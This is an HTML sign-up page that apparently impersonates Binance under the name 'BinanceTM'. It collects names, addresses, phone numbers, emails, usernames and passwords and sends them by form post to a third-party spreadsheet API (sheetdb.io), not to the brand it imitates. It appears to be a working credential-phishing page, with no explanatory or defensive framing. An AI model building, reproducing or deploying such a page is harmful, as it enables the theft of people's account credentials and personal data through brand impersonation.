<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
  height: 100%;
  margin: 0;
  font-family: Arial, Helvetica, sans-serif;
}

* {
  box-sizing: border-box;
}

.bg-img {
  background-image: url("00002.jpg");
  height: 800px;
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
  backdrop-filter: blur(15px);
  position: relative;
}

.container {
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  margin: 20px;
  max-width: 500px;
  padding: 16px;
  background-color: white;
}

table {
  width: 100%;
}

td {
  padding: 5px;
}

input[type="text"],
input[type="password"] {
  width: 100%;
  padding: 10px;
  border: none;
  background: #f1f1f1;
}

input[type="text"]:focus,
input[type="password"]:focus {
  background-color: #ddd;
  outline: none;
}

.btn {
  background-color: #F88D23;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  opacity: 0.9;
}

.btn:hover {
  opacity: 1;
}

h1 {
  text-align: center;
}
</style>
</head>
<body>
<div class="bg-img">
  <form action="https://sheetdb.io/api/v1/efotmwz0tg2pu" method="post" id="sheetdb-form" class="container">
    <h1>Sign up</h1>
    <p><b>BinanceTM Sign up</b></p>

    <table>
      <tr>
        <td><label for="FirstName"><b>First Name</b></label></td>
        <td><input type="text" placeholder="First Name" name="FirstName" required></td>
      </tr>
      <tr>
        <td><label for="LastName"><b>Last Name</b></label></td>
        <td><input type="text" placeholder="Last Name" name="LastName" required></td>
      </tr>
      <tr>
        <td><label for="Address"><b>Address</b></label></td>
        <td><input type="text" placeholder="Address" name="Address" required></td>
      </tr>
      <tr>
        <td><label for="PhoneNumber"><b>Phone Number</b></label></td>
        <td><input type="text" placeholder="Phone Number" name="PhoneNumber" required></td>
      </tr>
      <tr>
        <td><label for="Email"><b>Email</b></label></td>
        <td><input type="text" placeholder="Email" name="Email" required></td>
      </tr>
      <tr>
        <td><label for="Occupation"><b>Occupation</b></label></td>
        <td><input type="text" placeholder="Occupation" name="Occupation" required></td>
      </tr>
      <tr>
        <td><label for="Username"><b>Username</b></label></td>
        <td><input type="text" placeholder="Username" name="Username" required></td>
      </tr>
      <tr>
        <td><label for="Password"><b>Password</b></label></td>
        <td><input type="password" placeholder="Enter Password" name="Password" required></td>
      </tr>
      <tr>
        <td><label for="ConfirmPassword"><b>Confirm Password</b></label></td>
        <td><input type="password" placeholder="Confirm Password" name="ConfirmPassword" required></td>
      </tr>
    </table>

    <button type="submit" class="btn">Submit</button>
  </form>
</div>
</body>
</html>

